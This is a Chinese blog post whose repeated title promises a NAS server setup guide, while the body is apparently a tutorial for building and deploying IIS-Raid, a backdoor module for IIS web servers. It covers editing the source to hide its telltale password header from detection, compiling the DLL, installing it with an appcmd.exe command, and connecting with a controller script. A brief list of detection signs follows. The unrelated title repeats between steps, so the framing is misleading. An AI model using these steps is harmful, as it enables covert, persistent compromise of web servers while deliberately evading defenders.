nas存储服务器搭建详细教程(我家后门通洪荒)

文章前言

IIS Raid是本机的一个IIS模块,通过滥用IIS的可扩展性可以实现一个Web服务器后门并执行攻击者定义的自定义操作,本篇文章主要介绍IIS-Raid的构建和使用过程

测试环境

目标主机:Windows Server 2012 64位 Standard

目标版本:IIS 8.5

nas存储服务器搭建详细教程(我家后门通洪荒)

项目构建

Step 1:首下载项目源码到本地

https://github.com/0x09AL/IIS-Raid

nas存储服务器搭建详细教程(我家后门通洪荒)

Step 2:编辑/module/Functions.h文件并自定义密码字段,下面的SIMPLEPASS即为自定义的密码值,连接后门的时候在Http Header中定义,但是这里原版定义密码的HTTP头字段始终是一个值(X-Password),这无疑是一个典型的特征了,所以这里得实现自定义这个字段值,在以上定义代码中添加一个常量COM_PASSWD,如下代码:

nas存储服务器搭建详细教程(我家后门通洪荒)

Step 3:之后更改/module/HttpFactory.cpp 39行代码替换掉X-Password值为自定义的常量,如下代码所示:

nas存储服务器搭建详细教程(我家后门通洪荒)

Step 4:之后使用VS进行编译处理

nas存储服务器搭建详细教程(我家后门通洪荒)

Step 5:最终获得dll文件

nas存储服务器搭建详细教程(我家后门通洪荒)

后门部署

之后在命令行下使用appcmd.exe命令安装

#格式说明C:\\\\Windows\\\\system32\\\\inetsrv\\\\APPCMD.EXE install module /name:Module Name /image:\\\"%windir%\\\\System32\\\\inetsrv\\\\IIS-Backdoor.dll\\\" /add:true    #执行示例C:\\\\Windows\\\\system32\\\\inetsrv\\\\APPCMD.EXE install module /name:IIS_Backdoor /image:\\\"%windir%\\\\System32\\\\inetsrv\\\\IIS-Backdoor.dll\\\" /add:true

nas存储服务器搭建详细教程(我家后门通洪荒)

再次刷新模块可以看到IIS_backdoor

nas存储服务器搭建详细教程(我家后门通洪荒)

后门使用

首先修改项目中的iis_controller.py文件,添加个—headpass的命令行参数:

parser.add_argument(\\\'--headpass\\\', type=str, default=\\\"X-Password\\\", help=\\\"Header to user for password.\\\")

nas存储服务器搭建详细教程(我家后门通洪荒)

之后把自定义的HTT头字段名加入到HttpHeader中

连接成功入后如下图所示:

python3 iis_controller.py --url http://192.168.17.190/ --headpass COM_PASSWD --password admin@liuwei

演示视频

防御措施

下面是检测通信流量或模块部署的一些方法:

  • 检测命令行中appcmd.exe的执行

  • 如果可以拦截到WEB服务器的流量,请检查是否有任何base64编码的标头数据以下列任何字符串开头

PIN|GDMP|CREDSCMD|INJ|

参考链接

https://www.freebuf.com/sectool/231973.html

IIS Raid – Backdooring IIS Using Native Modules

原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34349.html

(0)
七芒星实验室's avatar七芒星实验室
上一篇 2024年4月4日 下午12:49
下一篇 2024年4月4日 下午12:51

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注